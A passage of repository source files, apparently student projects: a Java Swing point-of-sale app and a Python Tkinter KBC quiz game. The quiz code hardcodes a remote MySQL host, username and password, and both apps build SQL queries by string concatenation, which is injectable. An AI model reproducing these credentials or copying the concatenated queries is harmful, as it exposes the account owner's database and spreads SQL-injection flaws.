jLabel4.setText(\"BARCODE\");\n getContentPane().add(jLabel4);\n jLabel4.setBounds(50, 260, 60, 16);\n\n jLabel5.setText(\"PHOTO\");\n getContentPane().add(jLabel5);\n jLabel5.setBounds(50, 320, 60, 16);\n\n jLabel6.setText(\"PRICE\");\n getContentPane().add(jLabel6);\n jLabel6.setBounds(40, 490, 35, 16);\n getContentPane().add(tf_update_pid);\n tf_update_pid.setBounds(220, 30, 260, 26);\n getContentPane().add(tf_update_name);\n tf_update_name.setBounds(220, 100, 260, 26);\n getContentPane().add(tf_update_barcode);\n tf_update_barcode.setBounds(220, 250, 260, 26);\n\n lb_update_photo.setText(\"jLabel7\");\n getContentPane().add(lb_update_photo);\n lb_update_photo.setBounds(220, 300, 200, 110);\n\n ta_update_desc.setColumns(20);\n ta_update_desc.setRows(5);\n jScrollPane1.setViewportView(ta_update_desc);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(220, 140, 260, 100);\n\n tf_update_price.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_update_priceActionPerformed(evt);\n }\n });\n getContentPane().add(tf_update_price);\n tf_update_price.setBounds(220, 490, 260, 26);\n\n jButton1.setText(\"BROWSE\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(460, 350, 94, 29);\n\n jButton2.setText(\"SAVE\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(180, 540, 75, 29);\n\n lb_update_photo_path.setText(\"jLabel7\");\n getContentPane().add(lb_update_photo_path);\n lb_update_photo_path.setBounds(220, 450, 520, 16);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_update_priceActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_update_priceActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_update_priceActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n\n if ((tf_update_name.getText() == null) || (ta_update_desc.getText() == null)) {\n JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n } else {\n String newfilename = new Date().getTime() + \".jpg\";\n\n File file_obj1 = new File(lb_update_photo_path.getText()); //doubt 1\n\n new savefileinfolder(file_obj1, newfilename);\n\n try {\n\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from product where PID='\" + pid + \"'\");\n\n //resultset_obj.moveToCurrentRow();\n if (resultset_obj.next()) {\n\n resultset_obj.updateString(\"Name\", tf_update_name.getText());\n\n resultset_obj.updateString(\"Description\", ta_update_desc.getText());\n\n resultset_obj.updateString(\"Barcode\", tf_update_barcode.getText());\n\n resultset_obj.updateString(\"Price\", tf_update_price.getText());\n\n resultset_obj.updateString(\"Photo\", \"src/pics/\" + newfilename);\n\n resultset_obj.updateRow();\n\n JOptionPane.showMessageDialog(rootPane, \"DATA UPDATE SUCCESSFUL !\");\n\n }\n\n } catch (Exception e) {\n e.printStackTrace();\n }\n\n }\n\n\n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n\n JFileChooser jfc = new JFileChooser();\n\n int ans = jfc.showOpenDialog(this);\n\n if (ans == JFileChooser.APPROVE_OPTION) {\n File file_obj = jfc.getSelectedFile();\n\n lb_update_photo.setIcon(new ImageIcon(file_obj.getPath()));\n\n lb_update_photo_path.setText(file_obj.getPath());\n\n } else {\n JOptionPane.showMessageDialog(rootPane, \"you need to select a file to move further\");\n }\n\n }//GEN-LAST:event_jButton1ActionPerformed\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n // new updateproduct().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JLabel jLabel4;\n private javax.swing.JLabel jLabel5;\n private javax.swing.JLabel jLabel6;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JLabel lb_update_photo;\n private javax.swing.JLabel lb_update_photo_path;\n private javax.swing.JTextArea ta_update_desc;\n private javax.swing.JTextField tf_update_barcode;\n private javax.swing.JTextField tf_update_name;\n private javax.swing.JTextField tf_update_pid;\n private javax.swing.JTextField tf_update_price;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.4767986834049225,
"alphanum_fraction": 0.5184455513954163,
"avg_line_length": 42.418880462646484,
"blob_id": "81fa8886cbc1861ae756ca02a4e64742a0710a33",
"content_id": "fd16cd6429521ed055c578463dda1ce098c87e87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14719,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 339,
"path": "/who_wants_to_be_the_millionare/finalform.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "import threading\nfrom time import sleep\nfrom tkinter import *\nfrom tkinter.messagebox import *\n\nimport pyttsx3 as pyttsx3\nfrom pygame import mixer\nfrom pymysql import *\n# from ttkthemes import themed_tk as tk\n# from tkinter import ttk\nid_data_list=[]\nCOUNTER=0\nANS_COUNT=0\namount_list = [\"5,000\", \"10,000\",\"20,000\",\"40,000\",\"80,000\",\"1,60,000\", \"3,20,000\", \"6,40,000\",\"12,50,000\", \"25,00,000\", \"50,00,000\",\"1 Crore\", \"3 Crore\", \"5 Crore\", \"7 Crore\"]\nclass kbc3(Toplevel):\n def flip(self):\n global COUNTER\n engine = pyttsx3.init()\n engine.stop()\n msgbox = askquestion('Flip', 'Are you sure you want to Flip the question?')\n if msgbox == 'yes':\n\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER + 1])\n cr = conn.cursor()\n cr.execute(query_new)\n result = cr.fetchone()\n self.lb_question.config(text = result[1])\n self.bt_option_A.config(text = result[2])\n self.bt_option_B.config(text = result[3])\n self.bt_option_C.config(text = result[4])\n self.bt_option_D.config(text = result[5])\n self.flip(state = 'disable')\n COUNTER = COUNTER + 1\n\n\n def fiftyfifty(self):\n engine = pyttsx3.init()\n engine.stop()\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr = conn.cursor()\n cr.execute(query_new)\n result = cr.fetchone()\n if result[0][0] == 'A':\n self.bt_option_B.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n elif result[0][0] == 'B':\n self.bt_option_A.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n elif result[0][0] == 'C':\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n elif result[0][0] == 'D':\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.fifty.config(state = 'disable')\n\n def exit(self):\n engine = pyttsx3.init()\n engine.stop()\n msgbox = askquestion('Exit application', 'Are you sure you want to exit')\n if msgbox == 'yes':\n self.root.destroy()\n\n def confirm_ans(self, option_num):\n print(option_num)\n msgbox1 = askquestion('Confirm Answer', 'Are you sure about the answer?')\n if msgbox1 == 'yes':\n\n if option_num == 'A':\n self.bt_option_A.config(bg = \"#e0d902\")\n self.bt_option_A.config(state= 'disable')\n self.bt_option_B.config(state= 'disable')\n self.bt_option_C.config(state= 'disable')\n self.bt_option_D.config(state= 'disable')\n\n elif option_num == 'B':\n self.bt_option_B.config(bg=\"#e0d902\")\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n\n elif option_num == 'C':\n self.bt_option_C.config(bg=\"#e0d902\")\n self.bt_option_A.config(state=\"disable\")\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n\n\n elif option_num == 'D':\n self.bt_option_D.config(bg=\"#e0d902\")\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n engine = pyttsx3.init()\n engine.stop()\n sleep(2)\n self.check_ans(option_num)\n\n\n def check_ans(self,ans):\n print(ans)\n global id_data_list\n global COUNTER\n global ANS_COUNT\n global amount_list\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query2 = \"SELECT ans FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr1 = conn.cursor()\n cr1.execute(query2)\n result = cr1.fetchone()\n print(result[0])\n if ans == result[0]:\n mixer.init()\n clap = \"song/sahi.mp3\"\n mixer.music.set_volume(0.5)\n mixer.music.load(clap)\n mixer.music.play()\n self.bt_amount.config(text=amount_list[ANS_COUNT])\n self.bt_amount.config(bg=\"green\")\n self.amount_bt_list[ANS_COUNT].config(bg=\"green\", fg=\"white\")\n correct_ans = showinfo('Answer','Right answer')\n self.bt_option_A.config(state='normal', bg=\"WHITE\")\n self.bt_option_B.config(state='normal', bg=\"WHITE\")\n self.bt_option_C.config(state='normal', bg=\"WHITE\")\n self.bt_option_D.config(state='normal', bg=\"WHITE\")\n\n if ANS_COUNT<14:\n COUNTER = COUNTER + 1\n try:\n self.amount_bt_list[ANS_COUNT + 1].config(bg=\"#f9eb22\", fg=\"white\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr1 = conn.cursor()\n cr1.execute(query_new)\n result = cr1.fetchone()\n self.lb_question.config(text=result[1])\n self.bt_option_A.config(text=result[2])\n self.bt_option_B.config(text=result[3])\n self.bt_option_C.config(text=result[4])\n self.bt_option_D.config(text=result[5])\n sleep(1)\n\n def demo():\n engine = pyttsx3.init()\n engine.setProperty('rate',140)\n engine.say(result[1])\n sleep(1)\n engine.say('option a')\n engine.say(result[2])\n engine.say('option b')\n engine.say(result[3])\n engine.say('option c')\n engine.say(result[4])\n engine.say('option d')\n engine.say(result[5])\n engine.runAndWait()\n engine.stop()\n\n def demo2():\n t = threading.Thread(target=demo)\n t.start()\n\n self.root.after(1000,demo2)\n ANS_COUNT = ANS_COUNT + 1\n\n except:\n print(\"network prob\")\n else: #if the ques exceeds 14 that means the user has given all the correct answers\n engine = pyttsx3.init()\n engine.stop()\n self.bt_option_A.config(state = 'disable')\n self.bt_option_B.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n self.bt_option_D.config(state = 'disable')\n engine = pyttsx3.init()\n engine.setProperty('rate',140)\n engine.say(\"winner\")\n showinfo(\"\", \"winner\")\n # correct_ans = showinfo('Answer','Wrong Answer')\n else: #if ans doesnt match\n sleep(2)\n engine = pyttsx3.init()\n engine.stop()\n showinfo(\"\", 'you lose')\n\n def __init__(self,parent):\n # self.root=Tk()\n self.root = Toplevel(parent)\n self.root.transient(parent)\n self.root.parent = parent\n self.root.title(\"KBC\")\n self.root.protocol(\"WM_DELETE_WINDOW\", self.exit)\n self.root.iconbitmap(\"img/icon.ico\")\n self.root.config(background=\"#192E8B\")\n self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n self.root.configure(background=\"#090035\")\n #----------------Frame--------------------\n head_frame=Frame(self.root,bg=\"#090035\")\n middle_frame=Frame(self.root,bg=\"#090035\")\n #-----------------middle-------------------\n left_frame=Frame(middle_frame,bg=\"#090035\")\n left_frame.grid(row=0,column=0)\n #-----------------------------------left_frame---------------------------\n logo_frame=Frame(left_frame,bg=\"#090035\")\n option_frame=Frame(left_frame,bg=\"#090035\")\n logo_frame.pack(pady=20)\n option_frame.pack(pady=20)\n #----------------------------------------------------------------------\n amount_frame=Frame(middle_frame,bg=\"#090035\")\n amount_frame.grid(row=0,column=1)\n #-----------------------------------------\n body_frame=Frame(self.root,bg=\"#090035\")\n head_frame.pack()\n middle_frame.pack()\n body_frame.pack()\n #----------------life_line------------------------\n\n self.fifty=Button(head_frame,width=20,text=\"50-50\", font=('bold',12),borderwidth=5,bg=\"#3277e6\",fg=\"white\", command = self.fiftyfifty)\n self.fifty.grid(row=0,column=0,padx=50,pady=10)\n\n self.flip=Button(head_frame,width=20,text=\"Flip\", font=('bold',12),borderwidth=5,bg=\"#3277e6\",fg=\"white\", command = self.flip)\n self.flip.grid(row=0,column=1,padx=50,pady=10)\n #-----------------logo---------------------\n img = PhotoImage(file=\"img/que.png\")\n Label(logo_frame, image=img, bg='#090035').pack(pady=10)\n self.lb_question=Label(logo_frame,text=\"\",bg=\"#090035\",fg=\"white\",font=(\"bold\",12))\n self.lb_question.pack(pady=10)\n #-----------------option_frame--------------------------\n self.bt_option_A=Button(option_frame,width=40, command = lambda :self.confirm_ans('A'))\n self.bt_option_B=Button(option_frame,width=40, command = lambda :self.confirm_ans('B'))\n self.bt_option_C=Button(option_frame,width=40, command = lambda :self.confirm_ans('C'))\n self.bt_option_D=Button(option_frame,width=40, command = lambda :self.confirm_ans('D'))\n\n self.bt_option_A.grid(row=0,column=0,padx=10,pady=10)\n self.bt_option_B.grid(row=0,column=1,padx=10,pady=10)\n self.bt_option_C.grid(row=1,column=0,padx=10,pady=10)\n self.bt_option_D.grid(row=1,column=1,padx=10,pady=10)\n\n #------------------------amount_frame---------------------------------------------\n self.bt_15=Button(amount_frame,text=\"15 7 Crore\",width=\"20\")\n self.bt_15.pack()\n self.bt_14 = Button(amount_frame, text=\"14 5 Crore\", width=\"20\")\n self.bt_14.pack()\n self.bt_13 = Button(amount_frame, text=\"13 3 Crore\", width=\"20\")\n self.bt_13.pack()\n self.bt_12 = Button(amount_frame, text=\"12 1 Crore\", width=\"20\")\n self.bt_12.pack()\n self.bt_11 = Button(amount_frame, text=\"11 50,00,000\", width=\"20\")\n self.bt_11.pack()\n self.bt_10=Button(amount_frame,text=\"10 25,00,000\",width=\"20\")\n self.bt_10.pack()\n self.bt_9 = Button(amount_frame, text=\"9 12,50,000\", width=\"20\")\n self.bt_9.pack()\n self.bt_8 = Button(amount_frame, text=\"8 6,40,000\", width=\"20\")\n self.bt_8.pack()\n self.bt_7 = Button(amount_frame, text=\"7 3,20,000\", width=\"20\")\n self.bt_7.pack()\n self.bt_6 = Button(amount_frame, text=\"6 1,60,000\", width=\"20\")\n self.bt_6.pack()\n self.bt_5 = Button(amount_frame, text=\"5 80,000\", width=\"20\")\n self.bt_5.pack()\n self.bt_4 = Button(amount_frame, text=\"4 40,000\", width=\"20\")\n self.bt_4.pack()\n self.bt_3 = Button(amount_frame, text=\"3 20,000\", width=\"20\")\n self.bt_3.pack()\n self.bt_2 = Button(amount_frame, text=\"2 10,000\", width=\"20\")\n self.bt_2.pack()\n self.bt_1 = Button(amount_frame, text=\"1 5,000\", width=\"20\")\n self.bt_1.pack()\n self.amount_bt_list=[self.bt_1,self.bt_2,self.bt_3,self.bt_4,self.bt_5,self.bt_6,self.bt_7,self.bt_8,self.bt_9,self.bt_10,self.bt_11,self.bt_12,self.bt_13,self.bt_14,self.bt_15]\n #---------------------body frame------------------------------\n self.bt_quit=Button(body_frame,text=\"Quit\",font=(\"bold\",12),width=20,command=self.exit)\n self.bt_amount=Button(body_frame,font=(\"bold\",12),width=20)\n self.bt_quit.grid(row=0,column=0,padx=30,pady=10,)\n self.bt_amount.grid(row=0,column=1,padx=30,pady=10)\n #---------------------------Database-------------------------------------------\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query = \"SELECT q_id FROM `kbc1` ORDER BY rand() LIMIT 0,16\"\n cr=conn.cursor()\n cr.execute(query)\n result=cr.fetchall()\n print(result)\n # --------------global-----------------------------------------------------------\n global id_data_list\n id_data_list.clear()\n\n global COUNTER\n global ANS_COUNT\n COUNTER=0\n ANS_COUNT=0\n #--------------------------\n for i in range(0,len(result)):\n id_data_list.append(result[i][0])\n\n # print(id_data_list)\n query2 = \"SELECT * FROM `kbc1` where q_id =\"+str(id_data_list[COUNTER])\n # print(query)\n cr1=conn.cursor()\n cr1.execute(query2)\n result1=cr1.fetchone()\n\n def demo():\n engine = pyttsx3.init()\n engine.setProperty('rate', 140) # setting up new voice rate\n engine.say(result1[1])\n sleep(1)\n engine.say(\"option A\")\n engine.say(result1[2])\n engine.say(\"option B\")\n engine.say(result1[3])\n engine.say(\"option C\")\n engine.say(result1[4])\n engine.say(\"option D\")\n engine.say(result1[5])\n engine.runAndWait()\n engine.stop()\n\n def demo2():\n t1 = threading.Thread(target=demo)\n t1.start()\n\n # print(result)\n # print(id_data_list)\n self.root.after(500,demo2)\n self.lb_question.config(text=result1[1])\n self.bt_option_A.config(text=result1[2])\n self.bt_option_B.config(text=result1[3])\n self.bt_option_C.config(text=result1[4])\n self.bt_option_D.config(text=result1[5])\n\n self.root.mainloop()\n\n\n# if __name__ == '__main__':\n# kbc3()\n"
},
{
"alpha_fraction": 0.5540200471878052,
"alphanum_fraction": 0.5722548365592957,
"avg_line_length": 35.70664596557617,
"blob_id": "6322b667398a25c843928ab4026d852d39c87c08",
"content_id": "958a1e797ed26e4ef56798f174dde275ca800616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 22649,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 617,
"path": "/Point_Of_Sale-in_java/src/cashierhome.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport escpos.EscPos;\nimport escpos.EscPosConst;\nimport escpos.Style;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.time.LocalDateTime;\nimport java.time.format.DateTimeFormatter;\nimport java.util.ArrayList;\nimport java.util.Date;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.print.PrintService;\nimport javax.swing.ImageIcon;\nimport javax.swing.JOptionPane;\nimport javax.swing.table.AbstractTableModel;\nimport output.PrinterOutputStream;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n/**\n *\n * @author vedantmahajan\n */\npublic class cashierhome extends javax.swing.JFrame {\n\n /**\n * Creates new form cashierhome\n */\n ArrayList<mycart> cart = new ArrayList<>();\n\n int srno = 1, amount = 0, global_bid = -1;\n\n carttablemodel carttablemodel_obj;\n\n public cashierhome() {\n initComponents();\n\n setSize(1000, 1000);\n\n jPanel1.setVisible(false);\n\n lb_pid.setVisible(false);\n\n tf_net_total.setVisible(false);\n\n carttablemodel_obj = new carttablemodel();\n\n jTable1.setModel(carttablemodel_obj);\n }\n\n public class mycart {\n\n String pid, pname, price, qty, totalprice;\n\n int srno;\n\n mycart(int srno, String pid, String pname, String price, String qty, String totalprice) {\n this.srno = srno;\n\n this.pid = pid;\n\n this.pname = pname;\n\n this.price = price;\n\n this.qty = qty;\n\n this.totalprice = totalprice;\n\n }\n\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n tf_product_code = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jPanel1 = new javax.swing.JPanel();\n lb_product_photo = new javax.swing.JLabel();\n lb_product_name = new javax.swing.JLabel();\n lb_product_category = new javax.swing.JLabel();\n lb_product_price = new javax.swing.JLabel();\n lb_pid = new javax.swing.JLabel();\n jLabel6 = new javax.swing.JLabel();\n tf_quantity = new javax.swing.JTextField();\n jButton2 = new javax.swing.JButton();\n jLabel7 = new javax.swing.JLabel();\n tf_net_total = new javax.swing.JTextField();\n jScrollPane1 = new javax.swing.JScrollPane();\n jTable1 = new javax.swing.JTable();\n lb_amount = new javax.swing.JLabel();\n jButton3 = new javax.swing.JButton();\n jLabel2 = new javax.swing.JLabel();\n tf_mobile = new javax.swing.JTextField();\n jButton4 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"ENTER PRODUCT CODE :\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(40, 36, 170, 30);\n getContentPane().add(tf_product_code);\n tf_product_code.setBounds(240, 40, 200, 26);\n\n jButton1.setText(\"SHOW\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(500, 40, 82, 29);\n\n jPanel1.setLayout(null);\n\n lb_product_photo.setText(\"jLabel2\");\n jPanel1.add(lb_product_photo);\n lb_product_photo.setBounds(30, 30, 170, 160);\n\n lb_product_name.setText(\"jLabel3\");\n jPanel1.add(lb_product_name);\n lb_product_name.setBounds(260, 40, 180, 16);\n\n lb_product_category.setText(\"jLabel4\");\n jPanel1.add(lb_product_category);\n lb_product_category.setBounds(260, 100, 180, 16);\n\n lb_product_price.setText(\"jLabel5\");\n jPanel1.add(lb_product_price);\n lb_product_price.setBounds(260, 160, 200, 16);\n\n lb_pid.setText(\"jLabel2\");\n jPanel1.add(lb_pid);\n lb_pid.setBounds(420, 50, 45, 16);\n\n getContentPane().add(jPanel1);\n jPanel1.setBounds(40, 110, 550, 220);\n\n jLabel6.setText(\"ENTER QUANTITY : \");\n getContentPane().add(jLabel6);\n jLabel6.setBounds(60, 370, 160, 16);\n getContentPane().add(tf_quantity);\n tf_quantity.setBounds(270, 370, 190, 26);\n\n jButton2.setText(\"ADD TO CART\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(590, 370, 160, 29);\n\n jLabel7.setText(\"NET TOTAL :\");\n getContentPane().add(jLabel7);\n jLabel7.setBounds(630, 450, 80, 16);\n\n tf_net_total.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_net_totalActionPerformed(evt);\n }\n });\n getContentPane().add(tf_net_total);\n tf_net_total.setBounds(270, 410, 190, 26);\n\n jTable1.setModel(new javax.swing.table.DefaultTableModel(\n new Object [][] {\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null}\n },\n new String [] {\n \"Title 1\", \"Title 2\", \"Title 3\", \"Title 4\"\n }\n ));\n jScrollPane1.setViewportView(jTable1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(20, 480, 760, 270);\n getContentPane().add(lb_amount);\n lb_amount.setBounds(720, 450, 60, 0);\n\n jButton3.setText(\"DELETE\");\n jButton3.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton3ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton3);\n jButton3.setBounds(690, 750, 90, 29);\n\n jLabel2.setText(\"MOBILE NUMBER : \");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(20, 760, 114, 16);\n\n tf_mobile.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_mobileActionPerformed(evt);\n }\n });\n getContentPane().add(tf_mobile);\n tf_mobile.setBounds(140, 750, 200, 40);\n\n jButton4.setText(\"CheckOUT\");\n jButton4.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton4ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton4);\n jButton4.setBounds(350, 760, 110, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_net_totalActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_net_totalActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_net_totalActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n\n int quantity = Integer.parseInt(tf_quantity.getText());\n\n int total = (quantity * Integer.parseInt(lb_product_price.getText()));\n\n String Total = Integer.toString(total);\n\n tf_net_total.setText(Total);\n\n cart.add(new mycart(srno, lb_pid.getText(), lb_product_name.getText(), lb_product_price.getText(), tf_quantity.getText(), tf_net_total.getText()));\n\n srno++;\n\n amount = amount + total;\n\n String Amount = Integer.toString(amount);\n\n lb_amount.setText(Amount);\n\n carttablemodel_obj.fireTableDataChanged();\n\n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from product where Barcode='\" + tf_product_code.getText() + \"'\");\n\n try {\n if (resultset_obj.next()) {\n jPanel1.setVisible(true);\n\n String pid = Integer.toString(resultset_obj.getInt(\"PID\"));\n\n lb_pid.setText(pid);\n\n lb_product_name.setText(resultset_obj.getString(\"Name\"));\n\n lb_product_category.setText(resultset_obj.getString(\"Category\"));\n\n lb_product_price.setText(resultset_obj.getString(\"Price\"));\n\n String photopath = resultset_obj.getString(\"Photo\");\n\n lb_product_photo.setIcon(new ImageIcon(photopath));\n\n }\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n\n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton3ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton3ActionPerformed\n\n int rowselected = jTable1.getSelectedRow();\n\n if (rowselected < 0) {\n JOptionPane.showMessageDialog(rootPane, \"No Row Selected !\");\n } else {\n int serialnumber = cart.get(rowselected).srno;\n\n// try \n {\n cart.remove(serialnumber - 1);\n\n// resultset_obj.next();\n// \n// resultset_obj.deleteRow();\n }\n// catch (SQLException ex) \n// {\n// Logger.getLogger(category.class.getName()).log(Level.SEVERE, null, ex);\n// }\n\n carttablemodel_obj.fireTableDataChanged();\n// \n// getcategory();\n }\n\n }//GEN-LAST:event_jButton3ActionPerformed\n\n private void tf_mobileActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_mobileActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_mobileActionPerformed\n\n private void jButton4ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton4ActionPerformed\n\n DateTimeFormatter dtf = DateTimeFormatter.ofPattern(\"yyyy/MM/dd HH:mm:ss\");\n LocalDateTime now = LocalDateTime.now();\n System.out.println(dtf.format(now));\n\n String date = dtf.format(now);\n\n String mobile_number = tf_mobile.getText();\n\n String grand_total = lb_amount.getText();\n\n ResultSet resultset_obj1 = DBLoader.executeQuery(\"select * from bill\");\n\n try {\n resultset_obj1.moveToInsertRow();\n\n resultset_obj1.updateString(\"Date_of_bill\", date);\n\n resultset_obj1.updateString(\"Mobile\", mobile_number);\n\n resultset_obj1.updateString(\"Grand_total\", grand_total);\n resultset_obj1.insertRow();\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n ResultSet resultset_obj2 = DBLoader.executeQuery(\"select max(BID) BID from bill\");\n\n try {\n if (resultset_obj2.next()) {\n int j = 0;\n\n global_bid = resultset_obj2.getInt(\"BID\");\n\n for (int i = 0; i < cart.size(); i++) {\n mycart mycart_object = cart.get(i);\n ResultSet resultset_obj3 = DBLoader.executeQuery(\"select * from bill_details\");\n\n resultset_obj3.moveToInsertRow();\n\n resultset_obj3.updateInt(\"bid\", global_bid);\n\n resultset_obj3.updateString(\"pid\", mycart_object.pid);\n\n resultset_obj3.updateString(\"pname\", mycart_object.pname);\n\n resultset_obj3.updateString(\"price\", mycart_object.price);\n\n resultset_obj3.updateString(\"qty\", 